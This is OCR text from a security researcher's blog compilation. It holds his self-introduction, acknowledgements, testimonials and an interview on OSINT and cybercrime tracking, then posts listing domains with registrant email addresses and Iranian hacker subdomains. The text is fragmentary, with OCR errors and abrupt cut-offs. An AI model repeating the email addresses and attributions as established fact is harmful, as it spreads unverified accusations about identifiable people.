Group Inc; Summit Group Inc; Total Group Inc; Trans Group Inc; United Group Inc; Wescom 
Group Inc 
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- How come I’m the only one listed as a competitor in Jeffrey Carr’s Taia Global Competitors 
Slide? 


- What’s it’s like to run the infamous Astalavista.com portal back in 2003-2006 where | was 
acting as a Managing Director? 


- What it’s like to get the privilege to work as a security blogger at ZDNet’s Zero Day blog for 
four years? 


- What’s it’s like to work as a security blogger with Webroot for two years? 
- How | ended up and spend the last couple of years doing OSINT on the bad guys? 
- How | ended up having a project on the infamous Astalavista.box.sk? 


- A brief introduction into some of the latest developments and research that | posted on my 
personal blog - Dancho Danchev’s Blog - Mind Streams of Information Security Knowledge 


- How | ended up having a mobile application? 

- How | ended up having a personal memoir? 

- How | got busted? 

- What it’s like to visit the GCHQ? 

- What it’s like to meet the security industry? 

- What it’s like to visit RSA Europe 2012? 

- What it’s like to visit InfoSec 2012? 

- What it’s like to visit CyberCamp 2016? 

- What it’s like to get an invitation to visit Canada’s Security Service? 
- My DIA Needpedia Investment Proposal 

- How | ended up discovering a SolarWinds victim? 


- How | ended up with a real-time OSINT and cyber attack attribution campaign on the Conti 
Ransomware Gang? 


- How | ended up almost retiring and offering OSINT and threat intelligence training? 


Before | continue and actually present the topics which I'll cover exclusively in this video in- 
depth | would like to thank the following individuals with the idea to say big thanks for offering 
interest and support for some of my projects where I’m currently doing my best both personally 
and professionally to return them the favor: 


- Jamie Riden 
- Steve Santorelli 
- Michal Salat 
- John Young 
- Paul de Souza 
- Harrison Cook 
- lan Cook 
- Jeffrey Bardin 
- Liran Sorani 
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- Joe Steward 


| also wanted to take the time and effort to dedicate this video introduction to my ex-girfriend 
circa the 90’s Yordanka Ilieva with whom | worked on the infamous https://astalavista.com 
where | had the privilege to work on the infamous Astalavista Security Group Security Newslet- 
ter and received the necessary support and guidance in the context of making this high-quality 
security publication happen including everyone in the U.S that | know and have worked with 
in the context of fighting cybercrime where | wanted to say big thanks to everyone who ever 
approached me and said “keep up the good work” and “keep it coming” in the context of moti- 
vating me to continue doing my research and continue to publish high-quality research articles 
and proper cyber threat actor attribution research and analysis including the following people: 


- lvan Schmid - for being the coolest boss ever in the world and for welcoming me on board at 
one of the Web’s most popular Web site for hackers circa 2003-2006 where | had the privilege 
to work as a Managing Director of the portal with my ex-girlfriend circa the 90’s - Yordanka 
llieva while | was studying in the Netherlands. 


- Pascal Mittner - for being the second coolest boss ever in the world who | never really had the 
chance to meet personally but was properly doing my work and where | was actually getting 
paid to do my work 


- Gary Scott - with whom | had the privilege to exchange data and information during the 90’s 
on my way to 


produce a high-quality newsletter and actually threat intelligence type of brief for ScanSafe at 
the time which later on got acquired by Cisco 


- Paul Ferguson - for keeping it cool and for keeping in touch an for actually inspiring me to do 
my research 


into the field of cybercrime research through his daily publications at his personal blog 


- Alex Eckelberry - for keeping it cool and corporate and for actually inspiriting me to do my 
research in the 


field of cybercrime research and for running and maitaining Sunbelt Software which greatly 
inspired me to do my research in the field of cybercrime research 


- James McQuaid - for being among the few individuals to actually raise awareness on the 
existence of the Russian Business Network and for continuing to supply high-profile and high- 
value threat intelligence information on a variety of mailing lists 


- Jeffrey Bardin - for inviting me to join Treadstone71 as an OSINT Analyst and to actually allow 
me to work with him on a several projects where | actually earned the necessary amount to 
pay some of my bills and properly invest in several projects including to lauch one of the first 
commercial E-Shops for intelligence deliverables 


- Jeffrey Carr - for keeping it cool and for expressing his personal gratitude and commenting on 
my research in the context of “keeping it coming”. 


- Ken Dunham - for keeping it cool and for running a high-profile and popular mailing list for 
security trends and actual technical information on current and ongoing cyber attack trends 


- Jart Armit - for keeping it cool and for approaching me several times to say “hi” and “keep up 
the good work” 


- Robert McMillan - for being a true professional and a good friend with whom | had the privilege 
and speak and communicate on a numerous occassions 
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- Rob Lemos - for being a good proffessional and someone that | Know and have worked with 
and whose work I’ve followed in the past 


- Gregg Keizer - for being a true professional and for actually bothering to quote me and refer- 
ence me in several articles on numerous occassions 


- Gary Warner - for being a true professional and for being always on the front lines of fighting 
the bad guys and cybercrime internationally 


- Jorge Mieres - for being a true threat intelligence and cybercrime research professional and 
for keeping it cool in terms of new research and for offering a unique and in-depth overview 
and perspective on new and novel cyber attack trends and threats 


- Marcus Sachs - for keeping it cool and for being a true professional whose work I’ve followed 
in the past 


- Gunter Ollman - for being a true professional and a good friend with whom | actually got the 
chance to meet at RSA Europe 2012 


The World is small and infinite and we can definitely make it a better place by doing our work 
following the basic methodology that an “OSINT conducted today is a tax payer’s buck saved 
somewhere”. 


| owe everyone a big one and I’m doing my best both personally and professionally to return 
the favour. Bare with me. 


Stay tuned! 


The time has come for me to introduce myself professionally through the prism of the opinion 
of my fellow colleagues and friends from the industry. 


Here are some sample recommendations which I’ve received from friends colleagues and 
partners throughout the years with the idea to illustrate my experience and expertise in the 
field such as for instance: 


“| have been working in the security space for many years and for a very large part of that 
have been following the excellent research work that Dancho has been doing in identifying 
cyber criminals and doing complex analysis of highly advanced modern day malware attacks. 
Dancho is extremely well known in the security industry for the work he has done and continues 
todo. When we had the opportunity of collaborating with Dancho at Webroot, we didn’t hesitate. 
Dancho has proven to deliver on a continuous basis for us and his work is simply phenomenal. 
| look forward to working with Dancho for many years to come.” 


— Jacques Erasmus, was Dancho’s client 


“Dancho is an expert researcher who I’ve had the pleasure of working with on several hacker 
investigations for Taia Global clients. | consider Dancho one of the best and most insightful 
researchers working in InfoSec today.” 


— Jeffrey Carr, CEO, Taia Global, Inc., managed Dancho indirectly at Non-disclosure agreement 


“Dancho Danchev has his pulse on the cyber criminal community. | can think of few people 
who have his experience, skills and understanding when it comes to cyber intelligence and 
understanding the cyber threat. | cannot recommend Dancho enough.” 


— Lance Spitzner, President, The Honeynet Project, worked with Dancho at Non-disclosure 
agreement 


“Dancho is one of those exceedingly rare security professionals with not only an eye for un- 
covering the root cause of an attack and the ability to examine it from multiple angles, but 
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also explain his findings in a way that has a meaningful and direct impact on those tasked with 
defending against such attacks. | admire the depth of his analysis and his dogged determina- 
tion to track back who the criminal operators are despite the dangers he could be exposed to. 
Dancho gets two-thumbs-up from me and I'd hire him in a heart-beat if he ever makes it to the 
USA. In the meantime I'll keep on following his research, reading his blogs and looking forward 
to collaborating with him on future cyber crime investigations.” 


— Gunter Ollmann, Vice President of Research, Damballa, Inc., was with another company when 
working with Dancho at Non-disclosure agreement 


“Dancho is an exceptional information security professional; he continually goes the extra mile 
for clients and the security community. His knowledge and analysis in core areas as threat 
intelligence analysis, cybercrime counter Intelligence and competitive intelligence research is 
outstanding. He also manages the most difficult task with ease, that of communicating this in 
an understandable and meaningful form for the community. Working with Dancho over several 
years has been highly productive, and beneficial.” 


— Jart Armin, Editor, HostExploit, was with another company when working with Dancho at 
Non-disclosure agreement 


“| first knew Dancho when he was fresh out of college but already with a prodigious under- 
standing of information security matters. He became one of the experts in the Security Clinic 
on ITsecurity.com, a site | founded and was publishing at the time; and he willingly gave free 
security help and advice to visitors to the site. Since those days | have watched both his career 
and knowledge grow in leaps and bounds until he is now, without any doubt, one of the world’s 
leading experts on the shady world of cybercrime.” 


— Kevin Townsend, Founder/Editor, ITsecurity.com, worked directly with Dancho at ITsecu- 
rity.com 


“Dancho is a veritable mine of information, particularly on subjects like the ones he blogs about, 
such as Spam and malware campaigns and the actors behind them. | am an avid reader of his, 
and also have met Dancho at a few conferences that we’ve both attended. I’ve found him 
to be extremely friendly, and always ready to explain anything he’s been working on. Were | 
organising a conference, | would definitely send him an invite.” 


— Jamie Riden, Senior Consultant, NGS Secure, was with another company when working with 
Dancho at Non-disclosure agreement 


“While rebuilding the site security and fraud team at a leading online web site, threats and rapid 
evolution in the online security space necessitated | get up to speed quickly, and with more 
than a modicum of depth and breadth of understanding of current trends and risks in the cyber 
security realm. After spending considerable time building an information network of the most 
germane, relevant, and useful sources, a common thread emerged from the chatter of activity 
and updates - “Dancho Danchev”. As | poured over security publications, cyber-security jour- 
nals, blogs, and security vendor sites, | continued to see Dancho cited and acknowledged as 
the security researcher and expert who “broke the story” or “tipped off users to the nvulnera- 
bilities” or “alerted the community to threat vectors” for major events. Dancho has voluntarily 
shared critical information on what the crooks are up to and has been an invaluable and much 
appreciated resource. Dancho’s passion for his work is reflected in his genuine desire to quash 
the “bad guys” activities and share as much actionable information as he possibly can. | highly 
recommend Dancho to any organization seeking an top-notch expert and passionate evangelist 
of online security practices.” 


— Chris Duncan, Director - Customer Operations, CareerBuilder.com, was with another com- 
pany when working with Dancho at ZDNet 
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Here’s a brief interview with me which I gave to the original and upcoming re-launch of the 
infamous Astalavista.box.sk project: 


Dear Dancho - can you please introduce yourself and the latest Box.sk project? Can you please 
elaborate more on your experience in fighting cybercrime including your contributions to the 
threat intelligence gathering community and the U.S Security Industry? 


My name is Dancho Danchev. I’ve been an independent contractor doing OSINT cybercrime 
fighting and threat intelligence gathering for over a decade and I’m currently running one 
of the security industry’s leading security publications which is my personal blog where I’ve 
established the foundations for an efficient and relevant OSINT and law enforcement method- 
ology in terms of fighting and disrupting cybercrime internationally which led me to pursue a 
successful career with several high-profile U.S based companies and organizations throughout 
the past decade following a successful career as an ex-hacker throughout the 90’s. My daily 
routine consists of digging deep inside the cyber warfare realm in the context of responding 
to and tracking down high-profile nation-state sponsored or targeted malware campaigns and 
cybercrime incidents and keeping track of the bad guys as usual with the idea to contribute 
to the overall demise of cybercrime internationally and to actually contribute to the U.S Intel- 
ligence Community with operational and tactical intelligence including to actively support U.S 
Law Enforcement on its way to track down and respond to cybercrime events globally. 


My primary motivation for re-lauching a project on the original Astalavista.box.sk is to “show 
them how it’s done” in the context of reaching out to a broader audience in the context of 
offering practical tactical and operational advice in the World of cyber warfare information 
warfare operations and to present hardcore and never-published before potentially classified 
and sensitive material in the world of the U.S Intelligence Community and U.S Law Enforcement 
and to actually find a constructive and relevant way to say “hi” and “we’re back” to a loyal base 
of users globally and to actually find a way to “keep the spirit” of the Scene the way we know it. 
I’ve planned a set of new high-profile projects which | intend to communicate to our audience 
to a systematic and periodic basis with the idea to offer an insightful and unique peek inside 
the Scene the way we know it. 


What are some of the currently running Box.sk projects and what do you have planned for 
the future? 


We're currenty running a high-profile and extremely popular WordPress blog including a cyber 
security and hacking forum community and we’ve recently launched an extremely popular Call 
for Papers and Call for Innovation part of the WHGDG (World Hacker Global Domination Group) 
franchise where we're currently soliciting content in a variery of areas and on a variety of topics 
including a recently launched IRC server including an extremely popular search engine for 
hackers and security experts including the upcoming launch of our flagship publicly accessible 
product called Project Cybertronics VR for Hackers and Security Experts including an upcoming 
high-profile YouTube broadcast featuring folks and experts from the security industry and the 
Scene. 


We've also lined up a variety of high-profile and upcoming community-driven and publicly ac- 
cessible products and services and we'll be definitely looking forward to issuing periodic up- 
dates on their public and proprietary availability. “If it’s going to be massive it better be good” 
in the context of re-surrecting and re-launching the Scene’s and the security industry’s most 
popular Web site for hackers and security experts internationally. 


Among the key features of the portal include a flagship search engine for hackers and security 
experts which can be accesses at - and is currently indexing over 3M web sites for hackers and 
security experts. 
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What do you think about U.S National Security in a post-Snowden world? 


I’m a firm believer that building communities around leaked and classified data might not be 
the best way to actually communicate its value and actually reach out to a wider audience po- 
tentially blowing the whistle on currently active and sensitive and classified cyber surveillance 
and cyber intelligence type of programs part of the portfolio of services courtesy of the U.S Intel- 
ligence Community. I’m also positive that a new set of copy-cats will eventually emerge trying 
to potentially steal operational and tactical know-how from the leaked data potentially setting 
the foundations for their own private and proprietary cyber surveillance and cyber intelligence 
products. 


In terms of U.S National Security in a post-Snowden world | believe that a specific set of inter- 
national fan-base or actual clusters of supporters cannot really do much harm besides raising 
awareness on the actual state of cyber surveillance and cyber intelligence programs and their 
scale and reach internationally and can actually assist in building a more sophisticated internal 
security systems in place. 


The current state of U.S National Security has to do with a specific set of post 9/11 contractor 
base which are truly making an impact globally by launching new companies actually hiring 
people to work for them and actually are fully capable of disrupting and undermining today’s 
modern and sophisticated cybercrime-driven online activity that also includes various cyber 
jihad sentiments globally. Case in point would be ISIS which the U.S Cyber Command has 
specifically targeted and could be possibly used as the most relevant and recent example of 
fraudulent online cyber jihad activity up to present day in the context of a large scale inter- 
national campaign which basically attracted the U.S attention which resulted in a variety of 
Campaigns targeting pro-ISIS infrastructure and its supporters. 


How can you best describe your experience in tracking down and monitoring of the Koobface 
botnet? 


It took me two and a half years of active daily monitoring of the Koobface botnet to actually 
come up and properly provide the necessary technical research and analysis behind the actual 
working of the botnet and actually allow me to track down and publicly distribute a variety 
of personally identifiable information on one of the key members of the group which at some 
point resulted in having Facebook’s net-space IP block redirected to my personal blog including 
to actually have a personal message embedded on tens of thousands of infected hosts globally 
personally greeting me for my research into the Koobface botnet. At some point my research 
into the group’s whereabouts became the primary information source on the group’s activities 
internationally which resulted in a series of blog posts on the topic and greatly motivated me to 
continue my research into the way the botnet worked at the time through the systematic and 
daily publication of high-profile and never-published before technical analysis and research on 
the botnet’s la 


What’s the current state of the fight against cybercrime globally? 


While we're currently observing a lot of newly popping-up vendors and organizations who are 
actually good at tracking down and responding to cybercrime incidents and activities it should 
be clearly noted that high-profile think-tanks including independent researchers organizations 
and vendors who have been tracking down cybercrime incidents and profiling cybercrime activ- 
ities for decades should be easily considered a recommended reading in terms of their recently 
and historical published research in this area. 


It should be also clearly noted that wide-spread cooperation campaigns between the academic 
commercial and private sector are already taking place potentially undermining and contribut- 
ing to the overall lowering down of cybercrime activity globally. 
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What should be done in the broader context of fighting cybercrime internationally is a currently 
Ongoing OSINT and Law Enforcement operation similar to my recently launched crowd-sourced 
OSINT and Law Enforcement operation called “Uncle George” including my most recently pub- 
lished high-profile and available online for free Cybercrime Forum Data Set for 2019 which you 
can download and process and potentially reach out to me in terms of the actual enrichment 
and tracking and shutting down process. 


How can you best describe the ongoing intersection between law enforcement and the U.S 
Intelligence Community in the context of launching offensive lawful surveillance campaigns? 
Case in point is the recent take down and hijacking of the primary domain for Encrochat a 
proprietary encrypted mobile solution? Do you think Dutch law enforcement basically abused 
its technological “know-how” and expertise to target a commercial encrypted mobile solutions 
provider? 


This is something that’s extremely important in the context of fighting cybercrime but can defi- 
nitely raise someone’s eyebrows across the World in the context of preventing and responding 
to cybercrime and cyber jihad incidents globally in particular the intersection between U.S 
Law Enforcement and the U.S Intelligence Community. Case in point is the Dutch Intelligence 
Service which is quite experienced in fighting tracking down and actually responding to cyber- 
crime and cyber jihad incidents globally which is a great example of the intersection between 
law enforcement and a country’s Intelligence Agencies globally. Case in point is Encrochat 
which is basically a commercial enterprise which was successfully taken offline thanks to a co- 
operation between the Dutch Intelligence Service and Law Enforcement internationally which 
eventually led to the direct compromise of the primary command and control infrastructure of 
the company and the actual interception of ongoing messages and communication. 


Do you think that the launch of U.S Cyber Command is a step in the right direction? Do you 
think that publicly sharing proprietary malware releases on VirusTotal is an OPSEC violation? 
How do you think the U.S Cyber Command can better perform in the context of today’s modern 
offensive cyber warfare arms race? 


Successfully positioning a major U.S based and publicly accessible organization for the purpose 
of fighting to and responding to cybercrime and cyber attack incidents is a step in the right 
direction. It should be clearly evident that with the U.S Cyber Command looking to expand 
and extend its industry outreach campaigns and is actually bothering to share proprietary 
releases which can be clearly found in a huge number of public and private malware repositories 
thanks to third-party researchers and vendors this is definitely a step in the right direction. In 
the broader context of fighting cybercrime and responding to cyber jihad and cyber warfare 
Campaigns and incidents globally. 


You used to work on Astalavista.com one of Box.sk’s primary competitors throughout 2003- 
2006? What’s your impression for running and managing the portal? What really took place 
when it got hacked? 


| used to run and manage Astalavista.com which was the primary competitor of the original 
Astalavista.box.sk throughout 2003-2006 while | was studying in the Netherlands which greatly 
helped me make impact internationally and actually helped me pay the bills at the time. My pri- 
mary responsibilities were to manage and issue daily updates to the security directory including 
the security news section including the production of a highly popular and high-traffic volume 
Security Newsletter where | was also responsible for interviewing people from the Scene and 
the Security Industry. 


My other responsibilities included the overall look of the portal including the introduction of new 
sections including to actually manage and run advertising inventory where | was responsible 
for bringing more advertisers on board. 
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Is it true that you’re running one of the security industry’s most popular security publications? 
How did you originally launched the project? What’s the current state of the project? 


I’ve been been running my personal Dancho Danchev’s Blog since December, 2005 while | was 
still working or https://astalavista.com acting as a Managing Director of the portal where | was 
busy responsible for the daily updates of the Security Directory including the Security News 
section including the introduction of new 


What’s your attitude towards “4th party collection? 


As this has been my primary area of occupation throughout the last couple of years with the re- 
sults of my research published at my personal blog | believe that 4th party collection is largely 
driven by a specific set of folks and experts who are actually capable of making an impact and 
causing widespread damage across the cybercrime ecosystem internationally. Case in point 
is my most recently launched Law Enforcement and OSINT operation called “Uncle George” 
where I’ve managed to publicly process approximately 1M web sites from major and leading 
online cybercrime-friendly forum communities with the idea to assist U.S Law Enforcement and 
the U.S Intelligence Community on its way to enrich and actually process the data set poten- 
tially disrupting the cybercrime-friendly forum communities behind the campaign including to 
actually track down and prosecute the cybercriminals behind these campaigns. 


Do you believe that an over-populated security industry means lower OPSEC for high-profile 
operations? 


| think that as we’re continuing to witness the emergence and the existence of new cybercrime 
and OSINT researchers and analysts joining the security industry which could actually make 
the fight against cybercrime ever easier in case these researchers get invited into private mail- 
ing lists and private invite-only communities. | don’t necessarily think that an over-populated 
security industry means lower OPSEC for high-profile operations in case everyone involved in 
a specific campaign or operation is keeping track of its sources and sources of information. 


Who’s running the show in 2020? What can best describe a successful “4th party collection” 
or virtual SIGINT operation? Who’s running the show in terms of fighting cybercrime online? 


I’m currently observing the usual deal of research done by high-profile and well-known cyber- 
crime researchers and security experts that also includes vendors including a great deal of 
research done by novice researchers entering the cybercrime research ecosystem. In terms of 
a successful “4th party collection” | can best describe the process as a combination of Technical 
Collection OSINT analysis and actual enrichment and actual U.S Law Enforcement and U.S In- 
telligence Community outreach where the ultimate goal would be to track down the prosecute 
the cybercriminals behind these campaigns. 


Is it true that we live in an utopian World where North Korea and Iran-originating cyber attacks 
are basically launched by anything but nation-state actors namely Generation Y individuals 
who’re online starting to embrace new technologies meaning that “everything’s in order”? 


| can confirm an evident trend where the mainstream news media is over-hyping the use of 
remote access tools which in reality are good old fashioned trojan horses circa the 90’s in 
terms of launching targeted or widespread malicious software serving campaigns. Based on 
my research and analysis it should be clearly evident that both North Korea and Iran are lacking 
the necessary technical and operational “know-how” to launch or participate in high-profile 
Campaigns making it easier for these parties to outsource their cyber warfare or malicious 
software research and development needs to a third-party which could be for instance Russia. 


Do you believe that corrupt and potentially compromised North Korean online agents are actu- 
ally doing more harm than good by participation in cyber warfare campaigns using techniques 
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and methodologies that were common in use throughout the 90’s namely trojan horses and 
various other lawful surveillance tools? 


I’m clearly observing an increase in such type of “rogue agent” type of activity where North 
Korea or Iran-based hackers are actually directly undermining the OPSEC of their country’s 
offensive or defensive cyber warfare operations in terms of actually signaling trends and var- 
ious other indicators which could prove crucial in a possible attribution campaign or actual 
assessment of a specific country’s understanding of offensive and defensive cyber warfare. 


Were you surprised that you participated in a Top Secret GCHQ program monitoring hackers 
on Twitter called “Lovely Horse”? How do you think you made the list? 


This was quite a surprise and it was in fact a privilege and an honor to have made the list with 
my old Twitter account where | was busy contributing with research and various other type 
of activity announcements on a daily basis while working for my previous empower which is 
Webroot. | think | made the list based on my research and it would be definitely a privilege 
and an honor to learn more and actually find out more about related Top Secret or Classified 
program where I’ve participated with my research. 


What’s the current state of your currently ongoing law enforcement and OSINT operation 
“Uncle George”? 


The current state of my currently ongoing Law Enforcement and OSINT operation called “Uncle 
George” is an active cooperation between several researchers who approached me including 
a vendor in terms of enriching the actual data set potentially helping me reach out to U.S Law 
Enforcement on my way to assist U.S Law Enforcement on its way to track down and prosecute 
the cybercriminals behind these campaigns. Users interested in joining my currently ongoing 
Law Enforcement and OSINT operation “Uncle George” can do it here. 


Stay tuned! 


1 
2. https://archive.org/download/dancho-danchev-blog-e-book/Dancho_Danchev_Blog_E-Book.zip 
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19.2.16 A Portfolio of Recently Published WhoisXML API White Papers Courtesy of 
Me (2023-02-14 13:18) 


@ 
WhoisXMLAPI 


The Who Behind Domain, IP & Cyber Threat Intelligence 


[1] 
Dear blog readers, 


I’ve decided to share with everyone a recently released portfolio of white papers courtesy of 
me for [2]WhoisXML API where I’m currently acting as a DNS Threat Researcher. 


Sample white papers include: 

[3]Exposing a Currently Active Domains Portfolio of Known 419 Scammers and International 
Fraudsters - An OSINT Analysis 

[4]Exposing a Currently Active Domains Portfolio of Known 419 Scammers and International 
Fraudsters - An OSINT Analysis - Part Two 

[5]Exposing a Currently Active Domains Portfolio of Known 419 Scammers and International 
Fraudsters - An OSINT Analysis - Part Three 


[6]Exposing a Currently Active Domains Portfolio of Known to Have Been Used by Cyber Ji- 
hadists Internationally - An OSINT Analysis 


[7]Exposing a Currently Active Domains Portfolio of Known Cybercrime Gangs and Cybercrimi- 
nals Internationally - An OSINT Analysis 

[8]Exposing a Currently Active Domains Portfolio of Cybercrime-Friendly Forum Communities 
and Associated E-Shops for Stolen and Compromised Credit Card Details - An OSINT Analysis 


[9]Exposing a Currently Active Domains Portfolio of Known to Have Been Used by Ransomware 
Network Affiliate Based Participants Including Ransomware Gang Affiliates - An OSINT Analysis 


[10]Exposing a Currently Active Domains Portfolio of Known to Have Been Used by Ransomware 
Network Affiliate Based Participants Including Ransomware Gang Affiliates - An OSINT Analysis 
- Part Two 


[11]Exposing a Currently Active Domains Portfolio of Known to Have Been Used by Ransomware 
Network Affiliate Based Participants Including Ransomware Gang Affiliates - An OSINT Analysis 
- Part Three 

Sample photos include: 
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Parked on 222.35.137.237 are the following domains all using the "set up in 1990 in New York, 
the USA by three enthusiasts who have financial education" template: 
affina-groupnet .cn - Email: abuseemaildhcpo@gmail.com 
affina-groupnet .com - Email: jelly@infotorrent.ru 

affina-groupsvc .cc - Email: justin dickerson@ymail.com 
affina-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
alliance-groupmain .cc - Email: stiv2009@yahoo.com 
annuity-groupnet .cc - Email: justin dickerson@ymail.com 
assurity-groupco .cn - Email: realsupporters@yahoo.com 
bfs-groupinc .cc - Email: defrankpo@gmail.com 

cdi-groupmain .cn - Email: garry honn@yahoo.com 
cosco-groupmain .com - Email: 20090811112 700@antispam.alantron.com 
diamond-dream .cc - Email: morgan.greg@yahoo.com 

dove-groupli .cn - Email: abuseemaildhcp@gmail.com 

dummykeath .cc - Email: morgan.greg@yahoo.com 

eagle-groupmain .cn - Email: AntwanHarringtonJI@gmail.com 
extreme-groupinc .cn - Email: abuseemaildhcpo@gmail.com 
extreme-groupinc .com - Email: hell@e2mail.ru 

flatgroupfly .cc - Email: steven lucas 2000@yahoo.com 
geniouspartner .cn - Email: morgan.greg@yahoo.com 

holding-group .cn - Email: ronny.greg@yahoo.com 

integrity-groupinc .cc - Email: justin _dickerson@ymail.com 
integrity-groupsvc .cn - Email: abuseemaildhcpo@gmail.com 
keygroupmain .cn - Email: ErichSullivanKF@gmail.com 

libertygroup .cc - Email: LindseyKimSI@gmail.com 

lime-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
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Stay tuned! 
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19.2.17 Exposing Iran’s Hacking Scene and Hacking Ecosystem Major Web Site Repo- 
sitiories - An OSINT Analysis - Part Two (2023-02-21 17:07) 
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Dear blog readers, 


I’ve decided to share with everyone the results of a recent Technical Collection campaign which 
aims to collect tools of the trade including personally identifiable information on Iran based lone 
hacker groups including hacking groups. 


Related: 


- [2]Exposing Iran-based Hackers and Web Site Defacement Group’s Personal Web Sites Portfolio 
- Direct Technical Collection Download! Grab a Copy Today! 


- [3]Exposing Iran-based Hackers and Web Site Defacement Group’s Personal Web Sites Portfolio 
- Direct Technical Collection Download! Grab a Copy Today! - Part Two 


- [4]JExposing Iran’s Hacking Scene and Hacking Ecosystem Major Web Site Repositiories - An 
OSINT Analysis 


- [5]Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of 
Iran [RAR] 


- [6JA Qualitative and Technical Collection OSINT-Enriched Analysis of the Iranian Hacking Scene 
Through the Prism of the Infamous Ashiyane Digital Security Team [RAR] 


Sample web sites known to belong to lone Iran based hacker groups including hacker groups 
include: 


http://a-3is.persiangig.com/ 
http://a-dehghanfar.persiangig.com/ 
http://alb2a3j4m5.persiangig.com/ 
http://a74462.persiangig.com/ 
http://aali361.persiangig.com/ 
http://abbas-virus.persiangig.com/ 
http://abdrezaha.persiangig.com/ 
http://acid-zx.persiangig.com/ 
http://adamforush.persiangig.com/ 
http://adibii.persiangig.com/ 
http://afeel.persiangig.com/ 
http://afgar753.persiangig.com/ 
http://aflatoon-irani.persiangig.com/ 
http://afr-computer.persiangig.com/ 
http://afsaran-agrab.persiangig.com/ 
http://afshin111.persiangig.com/ 
http://agh45.persiangig.com/ 
http://ahura-id.persiangig.com/ 
http://ahwazdownload.persiangig.com/ 
http://ajaxteam.persiangig.com/ 
http://akams.persiangig.com/ 
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Premier Group Inc a = 


massive-groupsvc .cc - Email: chen.p00n1732646@yahoo.com 
massivegroupsvc .cn - Email: abuseemaildhcpo@gmail.com 
melson-groupmain .com - Email: enact@co5.ru 
mena-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
mena-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
opm-group .cn - Email: AbdulStaffordEP@gmail.com 
opm-groupli .com - Email: entrap@namebanana.net 
premier-groupinc .cn - Email: abuseemaildhcpo@gmail.com 
prime-groupco .com - Email: Email: fuzz@ml3.ru 
prime-groupinc .cc - Email: chen.p00n1732646@yahoo.com 
puritan-groupco .cc - Email: justin dickerson@ymail.com 
puritan-groupco .cn - Email: abuseemaildhcpo@gmail.com 
puritan-groupinc .cn - Email: abuseemaildhcpo@gmail.com 
reach-group .cc - Email: rick _morris@yahoo.com 
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http://alOn3-m4n.persiangig.com/ 
http://albert. persiangig.com/ 
http://ali-danger.persiangig.com/ 
http://ali0123.persiangig.com/ 
http://ali486.persiangig.com/ 
http://aliasp.persiangig.com/ 
http://aliclop.persiangig.com/ 
http://alierror1.persiangig.com/ 
http://alijojo.persiangig.com/ 
http://alipcl.persiangig.com/ 
http://alireza2008.persiangig.com/ 
http://alireza5800.persiangig.com/ 
http://alireza70707.persiangig.com/ 
http://alirezabiyal.persiangig.com/ 
http://alirezashiri.persiangig.com/ 
http://alirezaxxl.persiangig.com/ 
http://alisoft.persiangig.com/ 
http://alvlin.persiangig.com/ 
http://am-tools.persiangig.com/ 
http://amarok.persiangig.com/ 
http://amin77.persiangig.com/ 
http://aminkoas.persiangig.com/ 
http://aminsheikha.persiangig.com/ 
http://aminsm.persiangig.com/ 
http://amir-666.persiangig.com/ 
http://amir-pw.persiangig.com/ 
http://amir23.persiangig.com/ 
http://amir7hossein7.persiangig.com/ 
http://amirhossein021.persiangig.com/ 
http://amirjustfriend.persiangig.com/ 
http://amirmansoury.persiangig.com/ 
http://amirsalartavakoli.persiangig.com/ 
http://amirtakparl1.persiangig.com/ 
http://amolhackers.persiangig.com/ 


http://anatema.persiangig.com/ 
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http://anax2x.persiangig.com/ 
http://androidpoor.persiangig.com/ 
http://anjomanearabi.persiangig.com/ 
http://anobisprograms5.persiangig.com/ 
http://anonyr3z4.persiangig.com/ 
http://anti-h.persiangig.com/ 
http://anti-network.net/ 
http://anti-network.persiangig.com/ 
http://antichat. persiangig.com/ 
http://any-thing.persiangig.com/ 
http://anzalichi.persiangig.com/ 
http://apexpredator.persiangig.com/ 
http://applexxe.persiangig.com/ 
http://aragh.persiangig.com/ 
http://arak2005.persiangig.com/ 
http://arashaa.persiangig.com/ 
http://arazdownloadpg.persiangig.com/ 
http://arefmaramazi.persiangig.com/ 
http://aria-security.persiangig.com/ 
http://arianismmm.persiangig.com/ 
http://ario-barzan.persiangig.com/ 
http://arman98.persiangig.com/ 
http://armaninvisible.persiangig.com/ 
http://armingame.persiangig.com/ 
http://armintanha.persiangig.com/ 
http://artacyber.persiangig.com/ 
http://artenis.persiangig.com/ 
http://arvineasthackers.persiangig.com/ 
http://ashitor.persiangig.com/ 
http://ashkanan3.persiangig.com/ 
http://asm952.persiangig.com/ 
http://atrix.persiangig.com/ 
http://attack.persiangig.com/ 
http://avadakedavra.persiangig.com/ 
http://aware.persiangig.com/ 
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http://ayad-heydari.persiangig.com/ 
http://azazel.persiangig.com/ 
http://azg198.persiangig.com/ 
http://azizpoorian.persiangig.com/ 
http://b-i-o-s.persiangig.com/ 
http://b3ylux3.persiangig.com/ 


http://ba-onvan.persiangig.com/ 


http://babak-esmaeilpour.persiangig.com/ 


http://bachebahal.persiangig.com/ 
http://badjen3.persiangig.com/ 
http://bahman666.persiangig.com/ 
http://bamiran.persiangig.com/ 
http://baran-h4ck.persiangig.com/ 
http://bardiajoon.persiangig.com/ 
http://barfobaran.persiangig.com/ 
http://barfsong.persiangig.com/ 


http://barnamehnevesy.persiangig.com/ 


http://barzan.persiangig.com/ 
http://bazarche.persiangig.com/ 
http://beat20.persiangig.com/ 
http://befor.persiangig.com/ 
http://behfaraz.persiangig.com/ 
http://behzadmesri.persiangig.com/ 
http://best-bax.persiangig.com/ 
http://best-gold.persiangig.com/ 
http://bestbset.persiangig.com/ 
http://bestv.persiangig.com/ 
http://bia2bestfile.persiangig.com/ 
http://bia2music2.persiangig.com/ 
http://bia2saadi.persiangig.com/ 
http://bia2takmusic.persiangig.com/ 
http://big-killer.persiangig.com/ 
http://bigb4ng.persiangig.com/ 
http://bijism.persiangig.com/ 
http://bimbim.persiangig.com/ 
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http://biologystudentshirazu.persiangig.com/ 
http://black-shadow.persiangig.com/ 
http://blackcap.persiangig.com/ 
http://blackdata.persiangig.com/ 
http://blackfox.persiangig.com/ 
http://blackh4t.persiangig.com/ 
http://blackice.persiangig.com/ 
http://blacklast.persiangig.com/ 
http://blackportal.persiangig.com/ 
http://blackwizardmagician.persiangig.com/ 
http://blogskin.persiangig.com/ 
http://blueman.persiangig.com/ 
